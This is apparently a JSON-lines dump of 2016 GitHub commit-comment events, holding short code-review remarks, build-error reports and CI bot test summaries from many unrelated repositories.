{"id":"4518975726","type":"CommitCommentEvent","actor":{"login":"onemarjuaper"},"repo":{"name":"isccicg/template"},"payload":{"comment":{"id":18905080,"position":null,"line":null,"path":null,"commit_id":"cd886f77af606a1083c7e7153d42c2f21b119a91","created_at":"2016-09-06T02:55:05Z","updated_at":"2016-09-06T02:55:05Z","body":"BAJE ACTUALIZACIÓN "}},"created_at":"2016-09-06T02:55:05Z"}
{"id":"4518978392","type":"CommitCommentEvent","actor":{"login":"MecaCho"},"repo":{"name":"MecaCho/learnPython"},"payload":{"comment":{"id":18905083,"position":null,"line":null,"path":null,"commit_id":"26dadb3c84ff0d57c5ded7a84d7bb2c0c13a64aa","created_at":"2016-09-06T02:56:14Z","updated_at":"2016-09-06T02:56:14Z","body":"主要是列表的操作"}},"created_at":"2016-09-06T02:56:14Z"}
{"id":"4518979903","type":"CommitCommentEvent","actor":{"login":"joepogo"},"repo":{"name":"rdanbrook/nestopia"},"payload":{"comment":{"id":18905085,"position":null,"line":null,"path":null,"commit_id":"d0e7da915d047abfdd01fb962ecce8c93d9d8748","created_at":"2016-09-06T02:56:56Z","updated_at":"2016-09-06T02:56:56Z","body":"Great work on this bro! Whenever i try to compile this on my end i get this error:\r\n\r\nNestopia error C4716: 'Nes::Api::Machine::SetRamPowerState' : must return a value\r\n\r\n\r\n"}},"created_at":"2016-09-06T02:56:56Z"}
{"id":"4518980900","type":"CommitCommentEvent","actor":{"login":"bkazemi"},"repo":{"name":"scanmem/scanmem"},"payload":{"comment":{"id":18905086,"position":null,"line":null,"path":null,"commit_id":"ab566aed025144c66c9fc31bb18f73a369754db5","created_at":"2016-09-06T02:57:24Z","updated_at":"2016-09-06T02:57:24Z","body":"Yeah, unfortunately C isn't the cleanest language to work with both Unicode and ASCII interchangeably :\\\r\nUnicode integration will likely be another meticulous job to solve."}},"created_at":"2016-09-06T02:57:24Z"}
{"id":"4518981549","type":"CommitCommentEvent","actor":{"login":"MecaCho"},"repo":{"name":"MecaCho/learnPython"},"payload":{"comment":{"id":18905088,"position":13,"line":13,"path":"shuzi47.py","commit_id":"26dadb3c84ff0d57c5ded7a84d7bb2c0c13a64aa","created_at":"2016-09-06T02:57:42Z","updated_at":"2016-09-06T02:57:42Z","body":"#列表增加字符组"}},"created_at":"2016-09-06T02:57:42Z"}
{"id":"4518982430","type":"CommitCommentEvent","actor":{"login":"MecaCho"},"repo":{"name":"MecaCho/learnPython"},"payload":{"comment":{"id":18905089,"position":13,"line":13,"path":"shuzi47.py","commit_id":"26dadb3c84ff0d57c5ded7a84d7bb2c0c13a64aa","created_at":"2016-09-06T02:58:08Z","updated_at":"2016-09-06T02:58:08Z","body":"对对对"}},"created_at":"2016-09-06T02:58:08Z"}
{"id":"4518984010","type":"CommitCommentEvent","actor":{"login":"Agoni1"},"repo":{"name":"Agoni1/Agoni"},"payload":{"comment":{"id":18905090,"position":4,"line":2,"path":"README.md","commit_id":"c10666c9fec1d62727cd88e77cda002c838c23ff","created_at":"2016-09-06T02:58:45Z","updated_at":"2016-09-06T02:58:45Z","body":"fdgf"}},"created_at":"2016-09-06T02:58:45Z"}
{"id":"4518984974","type":"CommitCommentEvent","actor":{"login":"mrn0p3c"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18905092,"position":null,"line":null,"path":null,"commit_id":"2de38e5568de9f29c1e2f175ba92971308c20f78","created_at":"2016-09-06T02:59:09Z","updated_at":"2016-09-06T02:59:09Z","body":"i get this error \r\nhttp://prntscr.com/cencib\r\n"}},"created_at":"2016-09-06T02:59:09Z"}
{"id":"4518985676","type":"CommitCommentEvent","actor":{"login":"Wan-YunPeng"},"repo":{"name":"shellphish/rex"},"payload":{"comment":{"id":18905094,"position":null,"line":null,"path":null,"commit_id":"31b4377f3bd6551b94e3853ea95c75f395e35950","created_at":"2016-09-06T02:59:27Z","updated_at":"2016-09-06T02:59:27Z","body":"I find that I cannot install shellphish-qemu successfully. When I use \"python setup.py build\", I get \r\n\"shellphish-qemu/shellphish-qemu-cgc-base/rules.mak:57: recipe for target 'linux-user/main.o' failed\" . \r\nAnd when I use \"pip install shellphish-qemu\", I get\r\n\" Unable to clean shellphish-qemu-cgc-tracer\" and \"Failed building wheel for shellphish-qemu\"\r\nI cannot figure out why...."}},"created_at":"2016-09-06T02:59:27Z"}
{"id":"4523533670","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18917577,"position":null,"line":null,"path":null,"commit_id":"6dbe42fb65f4e6fd54d40993ab6d88c145b7693d","created_at":"2016-09-06T20:00:06Z","updated_at":"2016-09-06T20:00:06Z","body":"Have any other bugs I can fix?"}},"created_at":"2016-09-06T20:00:06Z"}
{"id":"4523535159","type":"CommitCommentEvent","actor":{"login":"fccoelho"},"repo":{"name":"FluVigilanciaBR/fludashboard"},"payload":{"comment":{"id":18917584,"position":5,"line":5,"path":"requirements.txt","commit_id":"a9bc0b4d7875a499f2968da5b0c0489ade89a996","created_at":"2016-09-06T20:00:22Z","updated_at":"2016-09-06T20:00:22Z","body":"you're right. it's folium\n\nOn Tue, Sep 6, 2016 at 1:31 PM, Ivan <notifications@github.com> wrote:\n\n> @fccoelho <https://github.com/fccoelho>, is it correct, folio? or maybe\n> this lib should be folium?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/FluVigilanciaBR/fludashboard/commit/a9bc0b4d7875a499f2968da5b0c0489ade89a996#commitcomment-18914124>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAIjW-i-9HQbvHGTqFeUv35NfXYpJc43ks5qnZVZgaJpZM4J2CGC>\n> .\n>\n\n\n\n-- \nFlávio Codeço Coelho\n================\n+55(21) 3799-5551\nProfessor\nEscola de Matemática Aplicada\nFundação Getulio Vargas\nPraia de Botafogo, 190 sala 312\nRio de Janeiro - RJ\n22250-900\nBrasil\n"}},"created_at":"2016-09-06T20:00:22Z"}
{"id":"4523538452","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18917593,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T20:00:56Z","updated_at":"2016-09-06T20:00:56Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2324 of 2334 tests passed, 1 test warnings)\n\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 5 tests had: MTR big diffs.\n * 6 tests had: Table big diffs.\n * 2 tests had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T20:00:56Z"}
{"id":"4523541213","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18917607,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-06T20:01:25Z","updated_at":"2016-09-06T20:01:25Z","body":"See, the way you had it, the damage could be negative.\r\nYOU DON'T WANT THAT."}},"created_at":"2016-09-06T20:01:25Z"}
{"id":"4523544118","type":"CommitCommentEvent","actor":{"login":"wester97"},"repo":{"name":"Bookt/Kigo-Sites-WordPress-Theme-Pack"},"payload":{"comment":{"id":18917609,"position":71,"line":64,"path":"instaparent/inc/MarketAreasTable.php","commit_id":"5fcd952eb70551e08e8ea1eb056c9e8224452cdf","created_at":"2016-09-06T20:01:56Z","updated_at":"2016-09-06T20:01:56Z","body":"Should this be part of the original $args?"}},"created_at":"2016-09-06T20:01:56Z"}
{"id":"4523544213","type":"CommitCommentEvent","actor":{"login":"esredson"},"repo":{"name":"projeto-siga/siga"},"payload":{"comment":{"id":18917611,"position":null,"line":null,"path":null,"commit_id":"651ef19b08cb3b73a369f0b0d33b7033bf528c46","created_at":"2016-09-06T20:01:58Z","updated_at":"2016-09-06T20:01:58Z","body":"3e367b0"}},"created_at":"2016-09-06T20:01:58Z"}
{"id":"4523546032","type":"CommitCommentEvent","actor":{"login":"kreativitea"},"repo":{"name":"ElizabethLane/HB_Project"},"payload":{"comment":{"id":18917613,"position":8,"line":63,"path":"static/js/update_goals.js","commit_id":"e092fb276aab8fcc52ce6f021d57df1d90c3888e","created_at":"2016-09-06T20:02:17Z","updated_at":"2016-09-06T20:02:17Z","body":"You probably want to revoke this token, since this is a public repo ❌ "}},"created_at":"2016-09-06T20:02:17Z"}
{"id":"4523547280","type":"CommitCommentEvent","actor":{"login":"harveychurch"},"repo":{"name":"Nerdomads/mazzcalc2.0"},"payload":{"comment":{"id":18917614,"position":null,"line":null,"path":null,"commit_id":"95a09586dfbc89c2aa49f37b4b7cdcb4b10c951b","created_at":"2016-09-06T20:02:30Z","updated_at":"2016-09-06T20:02:30Z","body":"I realize now... It is like a dummpy file :)\r\n"}},"created_at":"2016-09-06T20:02:30Z"}
{"id":"4523554056","type":"CommitCommentEvent","actor":{"login":"kreativitea"},"repo":{"name":"ElizabethLane/HB_Project"},"payload":{"comment":{"id":18917635,"position":30,"line":90,"path":"templates/user_goals.html","commit_id":"37efa3bfe295d3580b230acf6d0dfde29731dbd5","created_at":"2016-09-06T20:03:44Z","updated_at":"2016-09-06T20:03:44Z","body":"Since jinja has for loops, there's probably good ways to clean this up :)"}},"created_at":"2016-09-06T20:03:44Z"}
{"id":"4523554137","type":"CommitCommentEvent","actor":{"login":"wester97"},"repo":{"name":"Bookt/Kigo-Sites-WordPress-Theme-Pack"},"payload":{"comment":{"id":18917636,"position":83,"line":72,"path":"instaparent/inc/MarketAreasTable.php","commit_id":"5fcd952eb70551e08e8ea1eb056c9e8224452cdf","created_at":"2016-09-06T20:03:45Z","updated_at":"2016-09-06T20:03:45Z","body":"If you want an array of posts, I prefer get_posts()"}},"created_at":"2016-09-06T20:03:45Z"}
{"id":"4523555881","type":"CommitCommentEvent","actor":{"login":"sanderjo"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18917644,"position":null,"line":null,"path":null,"commit_id":"1157e498f01a787dff01e9ab3fb5610d60b60611","created_at":"2016-09-06T20:04:05Z","updated_at":"2016-09-06T20:04:05Z","body":"I would rename the title from \"First implementation of NTTP SSL\" to \"First implementation of Certificate checking of NTTP SSL\""}},"created_at":"2016-09-06T20:04:05Z"}
{"id":"4523556661","type":"CommitCommentEvent","actor":{"login":"wester97"},"repo":{"name":"Bookt/Kigo-Sites-WordPress-Theme-Pack"},"payload":{"comment":{"id":18917646,"position":87,"line":76,"path":"instaparent/inc/MarketAreasTable.php","commit_id":"5fcd952eb70551e08e8ea1eb056c9e8224452cdf","created_at":"2016-09-06T20:04:15Z","updated_at":"2016-09-06T20:04:15Z","body":"What is this doing?  Unsure about the encoding/decoding"}},"created_at":"2016-09-06T20:04:15Z"}
{"id":"4523559586","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18917652,"position":null,"line":null,"path":null,"commit_id":"f3409397b0215e67e015165ae5cd8dae03c5bece","created_at":"2016-09-06T20:04:48Z","updated_at":"2016-09-06T20:04:48Z","body":"good night hard worker"}},"created_at":"2016-09-06T20:04:48Z"}
{"id":"4523560185","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18917653,"position":null,"line":null,"path":null,"commit_id":"40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3","created_at":"2016-09-06T20:04:54Z","updated_at":"2016-09-06T20:04:54Z","body":"os_2_0_no_apppathhelpers (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T20:04:54Z"}
{"id":"4523561314","type":"CommitCommentEvent","actor":{"login":"kreativitea"},"repo":{"name":"ElizabethLane/HB_Project"},"payload":{"comment":{"id":18917659,"position":16,"line":12,"path":"templates/homepage.html","commit_id":"45368df56af16383cf8d205b0bd51f8a62db2088","created_at":"2016-09-06T20:05:10Z","updated_at":"2016-09-06T20:05:10Z","body":"Rather than using BR's to do spacing, it's considered better practice to use the built-in css tooling (margins, borders, etc)"}},"created_at":"2016-09-06T20:05:10Z"}
{"id":"4523562990","type":"CommitCommentEvent","actor":{"login":"wester97"},"repo":{"name":"Bookt/Kigo-Sites-WordPress-Theme-Pack"},"payload":{"comment":{"id":18917664,"position":1,"line":1616,"path":"instaparent/functions.php","commit_id":"5fcd952eb70551e08e8ea1eb056c9e8224452cdf","created_at":"2016-09-06T20:05:28Z","updated_at":"2016-09-06T20:05:28Z","body":"Is there any way to enqueue these scripts ONLY when they are needed?  Meaning when a page IS a market area both in the front/back end.  This seems like enough overhead that we should look into being selective when loading"}},"created_at":"2016-09-06T20:05:28Z"}
{"id":"4523567464","type":"CommitCommentEvent","actor":{"login":"puterleat"},"repo":{"name":"Rapporter/pander"},"payload":{"comment":{"id":18917674,"position":null,"line":null,"path":null,"commit_id":"72093863f3b601838dce5a8e01280b16131131e5","created_at":"2016-09-06T20:06:19Z","updated_at":"2016-09-06T20:06:19Z","body":"Works for me. Thanks for fixing so quickly."}},"created_at":"2016-09-06T20:06:19Z"}
{"id":"4523571685","type":"CommitCommentEvent","actor":{"login":"kreativitea"},"repo":{"name":"ElizabethLane/HB_Project"},"payload":{"comment":{"id":18917687,"position":8,"line":15,"path":"templates/user_goals.html","commit_id":"45368df56af16383cf8d205b0bd51f8a62db2088","created_at":"2016-09-06T20:07:06Z","updated_at":"2016-09-06T20:07:06Z","body":"Good acknowledgement! \r\n\r\n```\r\n<div id=\"goal_display\">\r\n{% for goal in goals %}\r\n    <div>{{goal.description}}</div>\r\n```\r\nI typically put the jinja in-line with the template piece, since you don't want it to interrupt the flow of the html."}},"created_at":"2016-09-06T20:07:06Z"}
{"id":"4523574937","type":"CommitCommentEvent","actor":{"login":"olets"},"repo":{"name":"mxstbr/sharingbuttons.io"},"payload":{"comment":{"id":18917699,"position":null,"line":null,"path":null,"commit_id":"6fe5c8f2d20cef0b9401405824e094c4ca2fee5a","created_at":"2016-09-06T20:07:43Z","updated_at":"2016-09-06T20:07:43Z","body":"@mxstbr any idea what happened to the wiki? that isn't a part of github I have much experience with"}},"created_at":"2016-09-06T20:07:43Z"}
{"id":"4523576285","type":"CommitCommentEvent","actor":{"login":"jimostrognai"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":18917700,"position":null,"line":null,"path":null,"commit_id":"c995616f2409e2b20e890e415d6dd3d38d5bc1fe","created_at":"2016-09-06T20:07:57Z","updated_at":"2016-09-06T20:07:57Z","body":"Since this change was put in, I get an error in Eclipse and cannot run the project.\r\nLine 199 \r\nreturn \"Platform.format\" throws this error.  The type Platform is not visible."}},"created_at":"2016-09-06T20:07:57Z"}
{"id":"4523577394","type":"CommitCommentEvent","actor":{"login":"kartik-v"},"repo":{"name":"kartik-v/yii2-grid"},"payload":{"comment":{"id":18917704,"position":176,"line":178,"path":"EditableColumnAction.php","commit_id":"90ed322fa3e4c190f4fd378c133f99432835cf2b","created_at":"2016-09-06T20:08:13Z","updated_at":"2016-09-06T20:08:13Z","body":"This is fixed with a later commit 7cca20a,"}},"created_at":"2016-09-06T20:08:13Z"}
{"id":"4523581095","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18917713,"position":null,"line":null,"path":null,"commit_id":"40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3","created_at":"2016-09-06T20:08:56Z","updated_at":"2016-09-06T20:08:56Z","body":"os_2_0_no_apppathhelpers (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T20:08:56Z"}
{"id":"4523581587","type":"CommitCommentEvent","actor":{"login":"w4rppy"},"repo":{"name":"w4rppy/zabbix-agent-playbook"},"payload":{"comment":{"id":18917715,"position":null,"line":null,"path":null,"commit_id":"413dca45e12ca6f62242a9fc0c2eafbe386b8887","created_at":"2016-09-06T20:09:01Z","updated_at":"2016-09-06T20:09:01Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;STsfmguh&#x2F;11-zabbix-agent-playbook\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> zabbix-agent-playbook</a>"}},"created_at":"2016-09-06T20:09:01Z"}
{"id":"4523581846","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917716,"position":9,"line":9,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T20:09:05Z","updated_at":"2016-09-06T20:09:05Z","body":"Fixed."}},"created_at":"2016-09-06T20:09:05Z"}
{"id":"4523582644","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917719,"position":21,"line":21,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T20:09:14Z","updated_at":"2016-09-06T20:09:14Z","body":"Fixed."}},"created_at":"2016-09-06T20:09:14Z"}
{"id":"4523583296","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917720,"position":28,"line":28,"path":"src/test/java/xigua/battle/of/elements/model/ElementListTest.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T20:09:21Z","updated_at":"2016-09-06T20:09:21Z","body":"Fixed."}},"created_at":"2016-09-06T20:09:21Z"}
{"id":"4523584309","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18917723,"position":null,"line":null,"path":null,"commit_id":"34768ba1bd6b271a16931d16cdfb4f6c157239ee","created_at":"2016-09-06T20:09:33Z","updated_at":"2016-09-06T20:09:33Z","body":"Well its pixhawk and even when I get it we have no xbees. I should had asked Jon to get them out for me during summer. So probably not until fall.\r\n"}},"created_at":"2016-09-06T20:09:33Z"}
{"id":"4523584805","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18917725,"position":3,"line":3,"path":"src/main/java/xigua/battle/of/elements/model/ElementListFullException.java","commit_id":"8aea390f166f95ca3ff269ced0113da6669e5d62","created_at":"2016-09-06T20:09:38Z","updated_at":"2016-09-06T20:09:38Z","body":"Fixed."}},"created_at":"2016-09-06T20:09:38Z"}
{"id":"4523585920","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917730,"position":26,"line":null,"path":"/var/www/PHPCI/shared/build/4073_ca6c0/app/Project.php","commit_id":"2f22788d6f3cd9060404c0f39fd8a97ed0e6ef04","created_at":"2016-09-06T20:09:49Z","updated_at":"2016-09-06T20:09:49Z","body":"\n      The class Project has a coupling between objects value of 17. Consider to reduce the number of dependencies under 13.\n    "}},"created_at":"2016-09-06T20:09:49Z"}
{"id":"4523585923","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917731,"position":26,"line":null,"path":"/var/www/PHPCI/shared/build/4074_1b5f5/app/Project.php","commit_id":"88c02ab68e6c2372cc995912f90c381f7d4b70a8","created_at":"2016-09-06T20:09:49Z","updated_at":"2016-09-06T20:09:49Z","body":"\n      The class Project has a coupling between objects value of 17. Consider to reduce the number of dependencies under 13.\n    "}},"created_at":"2016-09-06T20:09:49Z"}
{"id":"4523586934","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917736,"position":50,"line":null,"path":"/var/www/PHPCI/shared/build/4074_1b5f5/app/Jobs/SetupProject.php","commit_id":"88c02ab68e6c2372cc995912f90c381f7d4b70a8","created_at":"2016-09-06T20:10:01Z","updated_at":"2016-09-06T20:10:01Z","body":"PHPCS: Blank line found at end of control structure"}},"created_at":"2016-09-06T20:10:01Z"}
{"id":"4523586947","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917737,"position":50,"line":null,"path":"/var/www/PHPCI/shared/build/4073_ca6c0/app/Jobs/SetupProject.php","commit_id":"2f22788d6f3cd9060404c0f39fd8a97ed0e6ef04","created_at":"2016-09-06T20:10:01Z","updated_at":"2016-09-06T20:10:01Z","body":"PHPCS: Blank line found at end of control structure"}},"created_at":"2016-09-06T20:10:01Z"}
{"id":"4523586989","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917738,"position":8,"line":null,"path":"/var/www/PHPCI/shared/build/4074_1b5f5/app/Traits/ProjectRelations.php","commit_id":"88c02ab68e6c2372cc995912f90c381f7d4b70a8","created_at":"2016-09-06T20:10:01Z","updated_at":"2016-09-06T20:10:01Z","body":"PHPCS: There must be one blank line after the last USE statement; 2 found;"}},"created_at":"2016-09-06T20:10:01Z"}
{"id":"4523587001","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917739,"position":8,"line":null,"path":"/var/www/PHPCI/shared/build/4073_ca6c0/app/Traits/ProjectRelations.php","commit_id":"2f22788d6f3cd9060404c0f39fd8a97ed0e6ef04","created_at":"2016-09-06T20:10:01Z","updated_at":"2016-09-06T20:10:01Z","body":"PHPCS: There must be one blank line after the last USE statement; 2 found;"}},"created_at":"2016-09-06T20:10:01Z"}
{"id":"4523587041","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917740,"position":24,"line":null,"path":"/var/www/PHPCI/shared/build/4074_1b5f5/app/Traits/ProjectRelations.php","commit_id":"88c02ab68e6c2372cc995912f90c381f7d4b70a8","created_at":"2016-09-06T20:10:02Z","updated_at":"2016-09-06T20:10:02Z","body":"PHPCS: Each PHP statement must be on a line by itself"}},"created_at":"2016-09-06T20:10:02Z"}
{"id":"4523587047","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917741,"position":24,"line":null,"path":"/var/www/PHPCI/shared/build/4073_ca6c0/app/Traits/ProjectRelations.php","commit_id":"2f22788d6f3cd9060404c0f39fd8a97ed0e6ef04","created_at":"2016-09-06T20:10:02Z","updated_at":"2016-09-06T20:10:02Z","body":"PHPCS: Each PHP statement must be on a line by itself"}},"created_at":"2016-09-06T20:10:02Z"}
{"id":"4523588303","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917745,"position":17,"line":null,"path":"/var/www/PHPCI/shared/build/4074_1b5f5/app/Jobs/SetupProject.php","commit_id":"88c02ab68e6c2372cc995912f90c381f7d4b70a8","created_at":"2016-09-06T20:10:16Z","updated_at":"2016-09-06T20:10:16Z","body":"public function __construct(Project $project, $template_id) // FIXME: Change to use template instance"}},"created_at":"2016-09-06T20:10:16Z"}
{"id":"4523588358","type":"CommitCommentEvent","actor":{"login":"Deployer-CIBot"},"repo":{"name":"REBELinBLUE/deployer"},"payload":{"comment":{"id":18917746,"position":17,"line":null,"path":"/var/www/PHPCI/shared/build/4073_ca6c0/app/Jobs/SetupProject.php","commit_id":"2f22788d6f3cd9060404c0f39fd8a97ed0e6ef04","created_at":"2016-09-06T20:10:17Z","updated_at":"2016-09-06T20:10:17Z","body":"public function __construct(Project $project, $template_id) // FIXME: Change to use template instance"}},"created_at":"2016-09-06T20:10:17Z"}
{"id":"4523593419","type":"CommitCommentEvent","actor":{"login":"sschuberth"},"repo":{"name":"github/git-lfs"},"payload":{"comment":{"id":18917756,"position":null,"line":null,"path":null,"commit_id":"bd694cc70007f78393868f55a10687b32f9a633e","created_at":"2016-09-06T20:11:12Z","updated_at":"2016-09-06T20:11:12Z","body":"Just because I happened to see this commit: If you need a more recent Golang version that [installed by default](https://www.appveyor.com/docs/installed-software/#go) on the AppVeyor build nodes, I'd recommend to use [Chocolatey](https://chocolatey.org/) to install the [appropriate package](https://chocolatey.org/packages/golang) (with the version fixed to e.g. 1.7), similar to like I did to install Inno Setup."}},"created_at":"2016-09-06T20:11:12Z"}
{"id":"4523596366","type":"CommitCommentEvent","actor":{"login":"garrettjonesgoogle"},"repo":{"name":"googleapis/toolkit"},"payload":{"comment":{"id":18917763,"position":5,"line":83,"path":"src/main/java/com/google/api/codegen/InterfaceConfig.java","commit_id":"e7521492cd6a7a4c1fa6b59194a3b1c1e3dd80df","created_at":"2016-09-06T20:11:44Z","updated_at":"2016-09-06T20:11:44Z","body":"I would prefer removing the two other null checks here, since they will only be null when there are errors."}},"created_at":"2016-09-06T20:11:44Z"}
{"id":"4523597375","type":"CommitCommentEvent","actor":{"login":"abergeron"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":18917768,"position":5,"line":40,"path":"theano/gpuarray/tests/tstgpueye.c","commit_id":"5c9ad24e319831432bea2ee798b70a10011f7b0e","created_at":"2016-09-06T20:11:55Z","updated_at":"2016-09-06T20:11:55Z","body":"It's not impossible, but it would be much less safer since a varargs function does not convert its arguments to known types and thus would require that the user match the types exactly.\r\n\r\nThis is why I did not go that route."}},"created_at":"2016-09-06T20:11:55Z"}
{"id":"4523602438","type":"CommitCommentEvent","actor":{"login":"nimbooce"},"repo":{"name":"amahule/FBReaderJ"},"payload":{"comment":{"id":18917796,"position":null,"line":null,"path":null,"commit_id":"ea406735f90972ac28826dd600e093a0d4ead9ce","created_at":"2016-09-06T20:12:52Z","updated_at":"2016-09-06T20:12:52Z","body":"It would be better to combine the try/catch statements. "}},"created_at":"2016-09-06T20:12:52Z"}
{"id":"4523605653","type":"CommitCommentEvent","actor":{"login":"Proper-Job"},"repo":{"name":"hyperoslo/Sync"},"payload":{"comment":{"id":18917807,"position":null,"line":null,"path":null,"commit_id":"71388d3377a39b3b0d2a2ba2e4bb4a960434fd80","created_at":"2016-09-06T20:13:27Z","updated_at":"2016-09-06T20:13:27Z","body":"@3lvis excellent! Thank you for updating that so quickly. I was about to start a PR but you beat me to it :)"}},"created_at":"2016-09-06T20:13:27Z"}
{"id":"4523612240","type":"CommitCommentEvent","actor":{"login":"nimbooce"},"repo":{"name":"benetech/FBReaderJ"},"payload":{"comment":{"id":18917821,"position":null,"line":null,"path":null,"commit_id":"ea406735f90972ac28826dd600e093a0d4ead9ce","created_at":"2016-09-06T20:14:38Z","updated_at":"2016-09-06T20:14:38Z","body":"We should combine the try/catch statements to avoid having deep nesting."}},"created_at":"2016-09-06T20:14:38Z"}
{"id":"4523613295","type":"CommitCommentEvent","actor":{"login":"clade"},"repo":{"name":"clade/PyDAQmx"},"payload":{"comment":{"id":18917827,"position":64,"line":63,"path":"PyDAQmx/DAQmxFunctions.py","commit_id":"b6679c901dc7d0d26074b3c70c3f221b68aae234","created_at":"2016-09-06T20:14:50Z","updated_at":"2016-09-06T20:14:50Z","body":"As far as i remember, `DAQmxGetExtendedErrorInfo` returns more information but works only for error not warnng."}},"created_at":"2016-09-06T20:14:50Z"}
